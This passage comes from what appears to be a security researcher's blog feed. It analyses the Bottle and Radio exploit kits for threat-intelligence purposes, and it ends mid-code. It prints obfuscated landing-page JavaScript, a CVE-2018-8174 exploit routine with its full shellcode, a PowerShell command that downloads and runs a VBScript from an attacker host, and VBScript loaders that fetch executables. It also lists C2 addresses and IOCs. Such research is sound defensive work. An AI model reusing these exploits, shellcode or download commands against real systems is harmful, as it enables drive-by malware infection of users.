</code></pre></div></div> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>document['getElementById']('main')['innerHTML'] = "&lt;h1&gt;Customer Login&lt;/h1&gt;&lt;form&gt;&lt;input type='text'value='User'&gt;&lt;input type='password'&gt;&lt;input type='submit'value='Submit'&gt;&lt;/form&gt;";
</code></pre></div></div> <p>Next, the browser is identified from the User-Agent. 
If it is not Internet Explorer, the same dummy HTML is displayed and the script ends. Both the classic <code class="language-plaintext highlighter-rouge">MSIE</code> token and the IE11 form (<code class="language-plaintext highlighter-rouge">Trident</code> with <code class="language-plaintext highlighter-rouge">rv:11.0</code>) are recognised; the branch shown extracts the IE version number. The <code class="language-plaintext highlighter-rouge">else</code> branch guarded by the constant string comparison is dead code inserted by the obfuscator and never runs.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var _0x100f15 = navigator['userAgent'];
var _0xed2c96 = _0x100f15['indexOf']('compatible') &gt; -0x1 &amp;&amp; _0x100f15['indexOf']('MSIE') &gt; -0x1;
var _0x4d34a9 = _0x100f15['indexOf']('Trident') &gt; -0x1 &amp;&amp; _0x100f15['indexOf']('rv:11.0') &gt; -0x1;
if (_0xed2c96) {
    if (_0x2956('0x43', '^eQ7') !== _0x2956('0x44', '4@%$')) {
        var _0x41dde8 = new RegExp("MSIE (\d+\.\d+);");
        _0x41dde8['test'](_0x100f15);
        var _0x50d3cb = parseFloat(RegExp['$1']);
        return _0x50d3cb;
    } else {
        _0x53ccba(this, function () {
            var _0x2e6966 = new RegExp("function *\( *\)");
            var _0xdc7ac8 = new RegExp("\+\+ *(?:_0x(?:[a-f0-9]){4,6}|(?:\b|\d)[a-z0-9]{1,4}(?:\b|\d))", 'i');
            var _0x4fc827 = _0x118083('init');
            if (!_0x2e6966['test'](_0x4fc827 + 'chain') || !_0xdc7ac8['test'](_0x4fc827 + 'input')) {
                _0x4fc827('0');
            } else {
                _0x118083();
            }
        })();
    }
</code></pre></div></div> <p>If these checks pass, an image is displayed. The <code class="language-plaintext highlighter-rouge">1.gif</code> used here is a picture of a bottle. 
The <code class="language-plaintext highlighter-rouge">str1</code> displayed below the image is Japanese (“Loading . . . please wait”).</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var str1 = '読み込み中。 。 。 お待ちください&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;';
/* --- Snip --- */
if (chk &gt; 0x0) {
    var myimg = document['createElement']('img');
    myimg['setAttribute']('id', 'ldimg');
    myimg['setAttribute']('style', 'position:absolute;width:40%;left:30%;height:40%; top:20%; z-index: 10;display:inline');
    myimg['setAttribute']('src', 'file/1.gif');
    document['body']['appendChild'](myimg);
    var myp = document['createElement']('p');
    myp['setAttribute']('id', 'ldpr');
    myp['setAttribute']('style', 'font-size:30px; position:absolute; left:5%; text-align:center; height:10%; top:60%; width:90%; z-index:10;');
    document['body']['appendChild'](myp);
    for (var i = 0x0; i &lt;= LOAD_SECOND; i++) {
        var progress = Math['round'](i * 0x64 / LOAD_SECOND);
        (function (_0x368e63) {
            setTimeout(function () {
                change_progress(_0x368e63, str1);
            }, i * 0x3e8);
        }(progress));
    }
</code></pre></div></div> <p><img src="https://nao-sec.org/assets/2019-12-13/2.png" alt="" /></p> <p>Then it requests the exploit code. Three parameters are sent with the request:</p> <ol> <li>Internet Explorer version</li> <li>whether the platform is 64-bit</li> <li>Adobe Flash Player version</li> </ol> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>var is64 = 0x0;
if (navigator['platform']['indexOf']('64') != -0x1) is64 = 0x1;
var fls = flashChecker();
ajax({
    'type': 'GET',
    'dataType': 'jsonp',
    'timeOut': 0x2710,
    'url': '/conn.php?callback=?',
    'data': {
        'data1': chk,
        'data2': is64,
        'data3': fls['v']
    },
</code></pre></div></div> <p>This request is sent through the <code class="language-plaintext highlighter-rouge">ajax.min.js</code> shown earlier. 
Therefore a <code class="language-plaintext highlighter-rouge">callback</code> parameter is appended to the URL (JSONP).</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>function e() {
    var b = document.createElement("script"),
        c = (new Date).getTime() + Math.round(1e3 * Math.random()),
        d = "JSONP_" + c;
    a[d] = function (a) {
        clearTimeout(s), document.body.removeChild(b), q(a)
    }, b.src = h + (h.indexOf("?") &gt; -1 ? "&amp;" : "?") + "callback=" + d, b.type = "text/javascript", document.body.appendChild(b), f(d, b)
}
</code></pre></div></div> <p>On success, the response data is used to load the exploit code. If the second element of the response is non-empty, it is loaded in a hidden <code class="language-plaintext highlighter-rouge">embed</code> for the Adobe Flash Player exploit, <code class="language-plaintext highlighter-rouge">file/swf.swf</code>; otherwise the first element is loaded as a <code class="language-plaintext highlighter-rouge">text/vbscript</code> script for the Internet Explorer exploit, <code class="language-plaintext highlighter-rouge">file/vbs.vbs</code>. (The inner <code class="language-plaintext highlighter-rouge">else</code> branch is again the obfuscator’s dead code.)</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>'success': function (_0x2ad29a) {
    if (_0x2ad29a[0x1] != '') {
        if (_0x2956('0x69', '904!') !== _0x2956('0x6a', 'mNBB')) {
            var _0x5517a0 = document['createElement']('embed');
            _0x5517a0['src'] = _0x2ad29a[0x1];
            _0x5517a0['setAttribute']('style', 'width:1px; height:1px');
            document['body']['appendChild'](_0x5517a0);
        } else {
            var _0x33b1ee = cname + '=';
            var _0x3a1f81 = document['cookie']['split'](';');
            for (var _0x2e7aac = 0x0; _0x2e7aac &lt; _0x3a1f81['length']; _0x2e7aac++) {
                var _0x446c09 = _0x3a1f81[_0x2e7aac];
                while (_0x446c09['charAt'](0x0) == ' ') _0x446c09 = _0x446c09['substring'](0x1);
                if (_0x446c09['indexOf'](_0x33b1ee) != -0x1) return _0x446c09['substring'](_0x33b1ee['length'], _0x446c09['length']);
            }
            return '';
        }
    } else if (_0x2ad29a[0x0] != '') {
        var _0x5a39f4 = document['createElement']('script');
        _0x5a39f4['type'] = 'text/vbscript';
        _0x5a39f4['src'] = _0x2ad29a[0x0];
        document['body']['appendChild'](_0x5a39f4);
    }
}
</code></pre></div></div> <p><code 
class="language-plaintext highlighter-rouge">vbs.vbs</code> exploits CVE-2018-8174 and <code class="language-plaintext highlighter-rouge">swf.swf</code> exploits CVE-2018-15982.</p> <h3 id="cve-2018-8174">CVE-2018-8174</h3> <p><code class="language-plaintext highlighter-rouge">vbs.vbs</code> is protected only by a simple string encoding. Decoding it gives almost the same code as the public PoC.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Sub StartExploit
    UAF
    InitObjects
    vb_adrr=LeakVBAddr()
    vbs_base=GetBaseByDOSmodeSearch(GetUint32(vb_adrr))
    msv_base=GetBaseFromImport(vbs_base,"msvcrt.dll")
    krb_base=GetBaseFromImport(msv_base,"kernelbase.dll")
    ntd_base=GetBaseFromImport(msv_base,"ntdll.dll")
    VirtualProtectAddr=GetProcAddr(krb_base,"VirtualProtect")
    NtContinueAddr=GetProcAddr(ntd_base,"NtContinue")
    SetMemValue GetShellcode()
    ShellcodeAddr=GetMemValue()+8
    SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr)
    lIlll=GetMemValue()+69596
    SetMemValue ExpandWithVirtualProtect(lIlll)
    llIIll=GetMemValue()
    ExecuteShellcode
End Sub
StartExploit
</code></pre></div></div> <p>This is the shellcode it runs:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Function GetShellcode()
    IIlI=Unescape("%u0000%u0000%u0000%u0000") 
&amp;Unescape("%u4cbf%u73d0%udb2c%ud9c5%u2474%u5bf4%uc92b%uc3b1%u7b31%u0313%u137b%uc383%u3248%uc586%ub3ff%u1669%u129b%u1659%u5563%ud61f%u581b%u9794%ue9d7%u03ea%ued6c%u2b61%uaef9%uef65%ueece%ue36d%u2f59%ufcf2%uaf99%u42fa%uac50%uf9c5%ub9e8%u3441%u5399%u928a%u40ea%uf18e%uabfc%ub143%u91b1%uc263%u73c0%ua49c%u7ceb%u2d28%u4338%uee19%u04b5%uc8a6%ub29d%u5eaa%u48ee%ua716%u7468%ua355%u8963%uc79e%u923b%u5373%u8ee3%ue825%uef63%uae42%uec9b%u2c9b%uf16c%u7bfc%ubb1b%uf5f2%ub84e%u407a%u7b84%u3dbf%uf727%u3e7a%u132c%ubd03%uf4e5%u3d85%ufaf6%u84a1%u7100%uf9db%u8555%u4068%u4ea9%ubf2a%u5223%u1b5f%ue940%u64ac%u57cd%u1051%udcdd%u5fad%u25de%u08fd%ufc1f%u5df2%uf0d3%ua6bd%u85a8%u568f%u9ea5%u948e%u177e%u62d5%u6d0b%ucc2e%ua750%ua40d%udbed%uafc3%u23f1%u2fe4%u0ea9%u3bf4%u5177%u067d%uda7b%u7538%u1e4a%u0e97%u22a0%u1df4%u736b%uf652%u8450%uf9a3%u8bed%uc0dd%u7e05%ucce0%u860d%u32e3%u0232%ua7c3%ueacc%ubcc2%ufc37%u3c02%u0238%u3d04%uf9b0%uc72c%u1cd4%u37d0%ua2db%ud8ea%uebae%u89da%ub539%ud51e%ub3e9%ud55a%u8284%u7550%u5c69%ufc9d%u99d0%ub810%u099a%u13d4%u551e%u151c%u5d5b%u539e%u756b%u6290%u7a94%uadac%uc3e3%u2d5b%ud385%u35b3%u1b97%u49bc%u6f51%u4a3e%u1962%u3bcd%ufeda%uef25%u011c%uef4a%u75d6%ue8c8%ufce9%u8023%u0d53%u56ac%uf2a5%ua8d3%u866f%ua351%uee70%uc2bd%u1fc8%u6056%ue02a%u7659%u94e4%u765d%ub77e%ucf28%u2f6a%u2e8f%u506d%uf82f%ue918%ufacc%ud66c%u9c04%ue96e%u622a%u9fb8%ubd93%ue93b%u563f%ue848%u59bf%ud1cd%uf900%u9f58%u5ba4%ue901%u8b66%u169f%ub397%ue836%u4c68%ubcc8%ua0e3%ud249%u39b4%u2b49%u6c66%uc31e%u6e75%uec5f%u7b39%u2d8a%u0946%u5680%u54cb%u6b20%u0608%udfe3%ue269%u88cb%u9901%u8fbb%uadaf%u3f01%u5e1f%u7ab2%uec8f%uf355%ud601%u2fe0%ub634%uaa9e%u0300%u5986%ue7ea%u6545%u2bb1%u1ad0%ub714%u98e5%u5888%u0d84%u602a%ub613%u00c3%u18f5%u98db%u15e1%u528b%u12ce%u7f0e%uf857%u4eac%u5f1f%u4f3f%u7c49%ue640%u4155%u0709%ub995%u0200%u79fd%u3f2c%u86fd%u64e7%u0c16%u6160%uede9%ue470%u2d6c%u098e%ufe91%ub0e2%uaf26%u6a03%uc2b0%u67b9%u5190%u48c4%u95ee%u1838%u2fc9%uea33%ucca3%ucad3%ueb0e%ua64b%u25e4%u0d53%u5ff8%ueb23%u5f00%uff85%ucde8%uffd4%u7c1
7%uc865%ub8e4%u4127%u82af%u0137%u583f%u2f9b%u9eba%ucfe5%u4e3b%u7597%u3f0b%u302c%u934f%uebcd%u915b%u78f2%uf169%u8b4a%u016d%uda54%uea49%ub067%u691c%uc9b7%u8de1%uc968%u6a4b%u6bd6%u4328%u5f2b%ueb9a%ufa15%u135a%u8446%u4bf2%u3644%uf808%u2d83%ua621%u871f%u46da%u4625%u4dd5%uae62%u62cf%u23b9%u8f5f%u0d88%u0f0c%uce77%u67c1%u4614%u0844%u868d%u84e2%ud721%u3dbd%ubed4%udb2f%u6f5c%u4fcb%u6ff1%ue246%u1d65%u6c07%ub958%u1cbb%u15a4%u9006%u95f4" &amp;lIIII(IIIII("")))
    IIlI=IIlI &amp; String((&amp;h80000-LenB(IIlI))/2,Unescape("%u4141"))
    GetShellcode=IIlI
End Function
</code></pre></div></div> <h3 id="cve-2018-15982">CVE-2018-15982</h3> <p><code class="language-plaintext highlighter-rouge">swf.swf</code> is almost the same as the public PoC.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>package {
    import com.adobe.tvsdk.mediacore.metadata.Metadata;
    import flash.display.Sprite;
    import flash.events.Event;
    import flash.net.LocalConnection;
    import flash.system.Capabilities;
    import flash.utils.ByteArray;
    import flash.utils.Endian;
    public class Main extends Sprite {
</code></pre></div></div> <p>The shellcode it executes is the same as in the CVE-2018-8174 exploit.</p> <h2 id="shellcode">Shellcode</h2> <p>The shellcode downloads and executes the malware, just like other EKs. The downloaded malware is not encrypted.</p> <p>The shellcode is encoded with the Shikata Ga Nai encoder.</p> <p><img src="https://nao-sec.org/assets/2019-12-13/3.png" alt="" /></p> <p>The decoded shellcode is simple code that downloads and executes the malware. The APIs it resolves are as follows:</p> <p><img src="https://nao-sec.org/assets/2019-12-13/4.png" alt="" /></p> <p>The API hashing algorithm is imul83hAdd.</p> <p><img src="https://nao-sec.org/assets/2019-12-13/5.png" alt="" /></p> <p>Interestingly, the download URL string is also used as the mutex name, so the mutex leaks the download URL, a handy hunting artifact. 
<img src="https://nao-sec.org/assets/2019-12-13/6.png" alt="" /></p> <p>The malware is written to <code class="language-plaintext highlighter-rouge">%temp%</code> as <code class="language-plaintext highlighter-rouge">svchost.exe</code> and then executed with the WinExec function. <img src="https://nao-sec.org/assets/2019-12-13/7.png" alt="" /></p> <h2 id="malware">Malware</h2> <p>The malware appears to be unique; we have not seen it anywhere else. According to my friend <a href="https://twitter.com/VK_Intel">@VK_Intel</a>, this could be a stealer targeting Japan.</p> <p>These are the characteristics of this malware.</p> <ul> <li>Checks for a Japanese environment using GetUserDefaultUILanguage</li> <li>Downloads and uses unzip.exe from these websites <ul> <li>ftp://ftp.cadwork.ch/DVD_V20/cadwork.dir/COM/unzip.exe</li> <li>ftp://freddy-ru.starlink.ru/ckJlag/antivir/SDFix/apps/unzip.exe</li> <li>ftp://ftp.cadwork.ch/DVD_V20/cadwork.dir/COM/unzip.exe</li> </ul> </li> <li>Downloads and uses Tor <ul> <li>https://archive.torproject.org/tor-package-archive/torbrowser/8.0.8/tor-win32-0.3.5.8.zip</li> </ul> </li> <li>C2 <ul> <li>[POST] 5frjkvw2w3wv6dnv.onion/conn.php</li> <li>[GET] 5frjkvw2w3wv6dnv.onion/rd.php</li> <li>[POST] 4w6ylniamu6x7e3a.onion/connect.php <ul> <li>User-Agent is <code class="language-plaintext highlighter-rouge">Mozilla/5.0 (Windows NT 6.1; WOW64)</code></li> </ul> </li> </ul> </li> <li>Main file locations <ul> <li>%temp%</li> <li><code class="language-plaintext highlighter-rouge">C:\Users\Public</code></li> </ul> </li> </ul> <h2 id="finally">Finally</h2> <p>Bottle Exploit Kit is an exploit kit targeting Japan. It is not as sophisticated as the major exploit kits, but its JavaScript is elaborate. It has been active for at least three months, and its activity continues today. The vulnerabilities it exploits are the same ones used by other EKs, so the same precautions apply. Keep an eye on how it develops.</p> <p>Many people helped with our research. 
Special thanks to <a href="https://twitter.com/kafeine">@kafeine</a> and <a href="https://twitter.com/VK_Intel">@VK_Intel</a>.</p> <h2 id="ioc">IOC</h2> <ul> <li>BottleEK <ul> <li>Traffic <ul> <li>priv.inteleksys.com (139.180.136.22) <ul> <li>/</li> <li>/file/style.css</li> <li>/file/ajax.min.js</li> <li>/file/main.js</li> <li>/file/1.gif</li> <li>/conn.php</li> <li>/file/vbs.vbs</li> <li>/file/swf.swf</li> </ul> </li> <li>sales.inteleksys.com (139.99.115.204)</li> </ul> </li> <li>Hash <ul> <li>main.js <ul> <li>588bb25acf86ac18323d800372bbdc0eb89ba3ce80ed3d891a9c41b8db93df26</li> </ul> </li> <li>1.gif <ul> <li>f89a8cc4dee2ac551380d0ecf5ee2d6dc2d2be20bb1929599a23edf79d8ed127</li> </ul> </li> <li>vbs.vbs <ul> <li>0afe359d9659f9d43a737bf2e1fcbe4d7e216fee3085cad153a4548785bb0166</li> </ul> </li> <li>swf.swf <ul> <li>340bfa57fafda31843588619cf505d08bdf41b6c3caf0df2b3b260473f3768d1</li> </ul> </li> </ul> </li> </ul> </li> <li>Malware <ul> <li>Traffic <ul> <li>https://archive.torproject.org/tor-package-archive/torbrowser/8.0.8/tor-win32-0.3.5.8.zip</li> <li>5frjkvw2w3wv6dnv.onion <ul> <li>/conn.php</li> <li>/rd.php</li> </ul> </li> <li>4w6ylniamu6x7e3a.onion <ul> <li>/connect.php</li> </ul> </li> </ul> </li> <li>Hash <ul> <li>Malware <ul> <li>914eb64b93cbb631c710ef6cbd0f9cedf93415be421ccc6e285b288b87f3a246</li> <li>c1b67a30119107365c4a311479794e07afb631980a649749501cb9f511fb0ab4</li> </ul> </li> <li>DLL <ul> <li>7d6823211590d0c9beffb964051ff0638e3e00beae3274733a6ccdf5c41fdede</li> <li>6625c178cc56184a1d8f8d0cbabff3abcc90820cd158b5860b10d6196d606a82</li> </ul> </li> </ul> </li> </ul> </li> </ul>
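<p>Added example (not code from the nao_sec post, and not BottleEK’s own code): a stand-alone Node.js re-implementation of the two <code class="language-plaintext highlighter-rouge">main.js</code> routines described above, the array rotation and the Base64 / percent-decoding / RC4 string decoder, wired together as the obfuscator-style string accessor that the excerpts call as <code class="language-plaintext highlighter-rouge">_0x2956('0x43', '^eQ7')</code>. The sample array is constructed inside the script by running the same pipeline in reverse on a few chosen strings; the keys reuse the ones visible in the excerpts, but the plaintexts, the rotation count and every function name are assumptions made for the example, not values taken from <code class="language-plaintext highlighter-rouge">main.js</code>.</p>

```javascript
'use strict';
// Added example, not from the nao_sec post or from BottleEK's main.js. Node.js (uses Buffer).
// Re-implements the two deobfuscation steps:
//   1. rotate the string array      (while (--n) arr.push(arr.shift()))
//   2. decode one entry             (Base64 -> %xx per byte -> decodeURIComponent -> RC4)
// and wires them into the obfuscator-style accessor  get('0x43', '^eQ7').

// RC4 (KSA + PRGA) over JS strings whose char codes are bytes. It is symmetric,
// so the same function encrypts when the constructed sample is built below.
function rc4(key, data) {
  const s = Array.from({ length: 256 }, (_, i) => i);
  let j = 0;
  for (let i = 0; i < 256; i++) {
    j = (j + s[i] + key.charCodeAt(i % key.length)) & 0xff;
    [s[i], s[j]] = [s[j], s[i]];
  }
  let i = 0;
  j = 0;
  let out = '';
  for (let k = 0; k < data.length; k++) {
    i = (i + 1) & 0xff;
    j = (j + s[i]) & 0xff;
    [s[i], s[j]] = [s[j], s[i]];
    out += String.fromCharCode(data.charCodeAt(k) ^ s[(s[i] + s[j]) & 0xff]);
  }
  return out;
}

// Step 2 exactly as main.js does it: atob(), then every byte becomes %xx and
// decodeURIComponent() UTF-8-decodes the byte string; that result is the RC4 ciphertext.
function decodeEntry(b64, key) {
  const raw = Buffer.from(b64, 'base64').toString('binary'); // what atob() returns
  let pct = '';
  for (let i = 0; i < raw.length; i++) {
    pct += '%' + ('00' + raw.charCodeAt(i).toString(16)).slice(-2);
  }
  return rc4(key, decodeURIComponent(pct));
}

// Step 1: `while (--n) push(shift())` rotates left by n-1 positions. In main.js the
// count is incremented once (++) by the getCookie helper before the rotate is called.
function rotateArray(arr, n) {
  const a = arr.slice();
  while (--n) a.push(a.shift());
  return a;
}

// The accessor the obfuscated code calls as _0x2956('0x43', '^eQ7'):
// a hex index into the rotated array plus a per-call RC4 key, with a result cache.
function makeAccessor(rotatedArr) {
  const cache = new Map();
  return (idxHex, key) => {
    const idx = parseInt(idxHex, 16);
    const cacheKey = idx + '|' + key;
    if (!cache.has(cacheKey)) cache.set(cacheKey, decodeEntry(rotatedArr[idx], key));
    return cache.get(cacheKey);
  };
}

// Inverse of decodeEntry (RC4, UTF-8-encode the byte string, Base64).
// Only needed here to build the constructed sample; an analyst never needs it.
function encodeEntry(plain, key) {
  return Buffer.from(rc4(key, plain), 'utf8').toString('base64');
}

// ---- constructed sample (NOT data from main.js) ----------------------------------
// Plaintexts and rotation count are assumptions; the keys are the ones that appear in
// the post's excerpts ('^eQ7', '4@%$', '904!', 'mNBB') plus one made up ('n8Kz').
const SAMPLE = [
  ['getCookie', '^eQ7'],
  ['userAgent', '4@%$'],
  ['ja', '904!'],
  ['file/vbs.vbs', 'mNBB'],
  ['text/vbscript', 'n8Kz'],
];
const ROTATION_COUNT = 3; // value handed to rotateArray, i.e. rotate by 2 positions

// As it would sit in the file: encoded, then rotated the other way by ROTATION_COUNT-1,
// so the runtime rotation lands every entry back on the index the code uses.
const encoded = SAMPLE.map(([plain, key]) => encodeEntry(plain, key));
const FILE_ARRAY = rotateArray(encoded, encoded.length - (ROTATION_COUNT - 1) + 1);

// Full recovery: rotate first, then resolve every (index, key) pair the code uses.
function recoverStrings() {
  const get = makeAccessor(rotateArray(FILE_ARRAY, ROTATION_COUNT));
  return SAMPLE.map(([, key], i) => get('0x' + i.toString(16), key));
}

console.log(FILE_ARRAY);        // looks like Base64, but Base64 alone yields nothing readable
console.log(recoverStrings());  // ['getCookie', 'userAgent', 'ja', 'file/vbs.vbs', 'text/vbscript']
```

<p>To apply this to a real sample, replace <code class="language-plaintext highlighter-rouge">FILE_ARRAY</code> with the array literal from the file, set <code class="language-plaintext highlighter-rouge">ROTATION_COUNT</code> to the value the rotate function is actually called with (in <code class="language-plaintext highlighter-rouge">main.js</code> that is <code class="language-plaintext highlighter-rouge">_0x3c6c93</code> plus one, because of the <code class="language-plaintext highlighter-rouge">++</code> in the helper) and call the accessor with each index/key pair found in the code. An entry that decodes to gibberish with the right key usually means the rotation count is wrong, not the key.</p>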
  60. Weak Drive-by Download attack with “Radio Exploit Kit”

    Mon, 15 Jul 2019 15:00:00 -0000

    <h2 id="first">First</h2> <p>Since July 11, 2019, we have observed a new Drive-by Download attack, reached by redirection from an ad-network. It does not use a conventional Exploit Kit such as RIG or Fallout, but its own exploit kit. We call it “Radio Exploit Kit”.</p> <blockquote class="twitter-tweet" data-lang="ja"><p lang="en" dir="ltr">Malvertising -&gt; Unknown EK🚀 -&gt; <a href="https://twitter.com/hashtag/AZORult?src=hash&amp;ref_src=twsrc%5Etfw">#AZORult</a><br />(CC: <a href="https://twitter.com/malware_traffic?ref_src=twsrc%5Etfw">@malware_traffic</a>, <a href="https://twitter.com/jeromesegura?ref_src=twsrc%5Etfw">@jeromesegura</a>, <a href="https://twitter.com/BleepinComputer?ref_src=twsrc%5Etfw">@BleepinComputer</a>)<a href="https://t.co/CkSfs38D8q">https://t.co/CkSfs38D8q</a> <a href="https://t.co/Uk37R7g1xh">pic.twitter.com/Uk37R7g1xh</a></p>&mdash; nao_sec (@nao_sec) <a href="https://twitter.com/nao_sec/status/1149273164058222592?ref_src=twsrc%5Etfw">July 11, 2019</a></blockquote> <p>The Radio Exploit Kit is not advanced. It exploits CVE-2016-0189, a vulnerability that has been heavily used by exploit kits for years and has been patched since May 2016 (MS16-051), and the kit’s code is unrefined: it simply delivers malware (we observed AZORult) using the public PoC for CVE-2016-0189. We do not expect it to be a serious threat; most users will not be affected. However, we write this article because it is often observed in Japan. Be aware that such threats exist.</p> <h2 id="traffic">Traffic</h2> <p>This exploit kit is still evolving. Five updates have been made since we started observing it (including simple path changes). We identify each one as follows. 
Here we introduce v1.0, 1.1 and 1.2.0.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Version  First seen        2nd URL
1.0      2019-07-11_10-00  https[:]//radiobox-online.org/images/image.vbs2
1.1      2019-07-12_20-00  http[:]//95.215.207.24/error.jp
1.2.0    2019-07-13_14-00  http[:]//95.215.207.24/im/1.jpg
1.2.1    2019-07-13_15-00  http[:]//95.215.207.24/im/build1.jpg
1.2.2    2019-07-14_13-00  http[:]//95.215.207.24/im/build11.jpg
1.2.3    2019-07-14_20-00  http[:]//95.215.207.24/im/vkino2.mid
</code></pre></div></div> <h3 id="v10">v1.0</h3> <p>First, let’s look at v1.0. This is the traffic from when we first encountered Radio EK.</p> <p><img src="https://nao-sec.org/assets/2019-07-16/1.0.png" alt="" /></p> <p>When the browser is redirected from the ad-network to <code class="language-plaintext highlighter-rouge">https[:]//radiobox-online.org</code>, code that exploits CVE-2016-0189 is executed. It is not obfuscated and is the same as the public PoC. The important part is this: the exploit’s payload simply launches PowerShell to download and run a VBScript.</p> <div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Set Object = CreateObject("Shell.Application")
Object.ShellExecute "PowerShell","(New-Object System.Net.WebClient).DownloadFile('https[:]//radiobox-online.org/images/image.vbs2','documentation.vbs');Start-Process 'documentation.vbs'"
</code></pre></div></div> <p>This generates the second request. 
<code class="language-plaintext highlighter-rouge">image.vbs2</code> is a very simple code.</p> <div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">mm</span> <span class="o">=</span> <span class="s">"h"</span> <span class="n">nn</span> <span class="o">=</span> <span class="s">"t"</span> <span class="n">bb</span> <span class="o">=</span> <span class="s">"/"</span> <span class="n">vv</span> <span class="o">=</span> <span class="s">":"</span> <span class="n">cc</span> <span class="o">=</span> <span class="s">"p"</span> <span class="n">x</span> <span class="o">=</span> <span class="s">"."</span> <span class="n">zz</span> <span class="o">=</span> <span class="s">"vbs"</span> <span class="n">q</span> <span class="o">=</span> <span class="s">"0"</span> <span class="n">w</span> <span class="o">=</span> <span class="s">"1"</span> <span class="n">e</span> <span class="o">=</span> <span class="s">"2"</span> <span class="n">r</span> <span class="o">=</span> <span class="s">"3"</span> <span class="n">t</span> <span class="o">=</span> <span class="s">"4"</span> <span class="n">y</span> <span class="o">=</span> <span class="s">"5"</span> <span class="n">u</span> <span class="o">=</span> <span class="s">"6"</span> <span class="n">a</span> <span class="o">=</span> <span class="s">"7"</span> <span class="n">s</span> <span class="o">=</span> <span class="s">"8"</span> <span class="n">f</span> <span class="o">=</span> <span class="s">"9"</span> <span class="n">strr</span> <span class="o">=</span> <span class="n">mm&amp;nn&amp;nn&amp;cc&amp;vv&amp;bb&amp;bb</span> <span class="n">rrts</span> <span class="o">=</span> <span class="n">t&amp;y&amp;x&amp;w&amp;e&amp;x&amp;e&amp;w&amp;y&amp;x&amp;w&amp;y&amp;a&amp;bb</span> <span class="n">rprt</span> <span class="o">=</span> <span class="n">strr&amp;rrts</span> <span class="n">d</span><span class="p">.</span><span class="n">Add</span> <span class="s">"1"</span><span 
class="p">,</span> <span class="s">""</span><span class="o">&amp;</span><span class="n">rprt&amp;</span><span class="s">"src/load2.jpg|"</span><span class="o">&amp;</span><span class="n">temp&amp;</span><span class="s">"\temp.vbs"</span> <span class="k">Set</span> <span class="n">x</span> <span class="o">=</span> <span class="n">CreateObject</span><span class="p">(</span><span class="s">"MSXML2.XMLHTTP"</span><span class="p">)</span> <span class="k">For</span> <span class="k">Each</span> <span class="n">i</span> <span class="ow">In</span> <span class="n">d</span> <span class="n">x</span><span class="p">.</span><span class="n">open</span> <span class="s">"GET"</span><span class="p">,</span> <span class="n">Split</span><span class="p">(</span><span class="n">d</span><span class="p">.</span><span class="n">Item</span><span class="p">(</span><span class="n">i</span><span class="p">),</span> <span class="s">"|"</span><span class="p">)(</span><span class="mi">0</span><span class="p">),</span> <span class="n">false</span> <span class="n">x</span><span class="p">.</span><span class="n">send</span><span class="p">()</span> </code></pre></div></div> <p>This will load <code class="language-plaintext highlighter-rouge">load2.jpg</code>. 
<code class="language-plaintext highlighter-rouge">load2.jpg</code> is also a simple code.</p> <div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">Set</span> <span class="n">css</span> <span class="o">=</span> <span class="n">CreateObject</span><span class="p">(</span><span class="s">"WScript.Shell"</span><span class="p">)</span> <span class="n">css</span> <span class="o">=</span> <span class="s">"http[:]//45.12.215.157/images/"</span> <span class="n">ico</span> <span class="o">=</span> <span class="s">".exe"</span> <span class="n">css1</span> <span class="o">=</span> <span class="s">"temp"</span> <span class="o">&amp;</span> <span class="n">rand</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">100</span><span class="p">)</span> <span class="n">css2</span> <span class="o">=</span> <span class="s">"temp"</span> <span class="o">&amp;</span> <span class="n">rand</span><span class="p">(</span><span class="mi">101</span><span class="p">,</span> <span class="mi">200</span><span class="p">)</span> <span class="n">css3</span> <span class="o">=</span> <span class="s">"temp"</span> <span class="o">&amp;</span> <span class="n">rand</span><span class="p">(</span><span class="mi">201</span><span class="p">,</span> <span class="mi">300</span><span class="p">)</span> <span class="n">css4</span> <span class="o">=</span> <span class="s">"temp"</span> <span class="o">&amp;</span> <span class="n">rand</span><span class="p">(</span><span class="mi">301</span><span class="p">,</span> <span class="mi">400</span><span class="p">)</span> <span class="n">css5</span> <span class="o">=</span> <span class="s">"temp"</span> <span class="o">&amp;</span> <span class="n">rand</span><span class="p">(</span><span class="mi">401</span><span class="p">,</span> <span class="mi">500</span><span class="p">)</span> <span class="k">Set</span> <span class="n">oShell</span> <span class="o">=</span> 
<span class="n">CreateObject</span><span class="p">(</span> <span class="s">"WScript.Shell"</span> <span class="p">)</span> <span class="n">temp</span><span class="o">=</span><span class="n">oShell</span><span class="p">.</span><span class="n">ExpandEnvironmentStrings</span><span class="p">(</span><span class="s">"%TEMP%\"</span><span class="p">)</span> <span class="k">Dim</span> <span class="nv">good</span> <span class="k">Set</span> <span class="n">good</span> <span class="o">=</span> <span class="n">CreateObject</span><span class="p">(</span><span class="s">"WScript.Shell"</span><span class="p">)</span> <span class="n">good</span> <span class="o">=</span> <span class="mi">200</span> <span class="c1">''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''1</span> <span class="n">set</span> <span class="n">d</span> <span class="o">=</span> <span class="n">CreateObject</span><span class="p">(</span><span class="s">"Scripting.Dictionary"</span><span class="p">)</span> <span class="n">d</span><span class="p">.</span><span class="n">Add</span> <span class="s">"1"</span><span class="p">,</span> <span class="s">""</span> <span class="o">&amp;</span> <span class="n">css</span> <span class="o">&amp;</span> <span class="s">"1.jpg|"</span><span class="o">&amp;</span><span class="n">temp&amp;</span><span class="s">""</span> <span 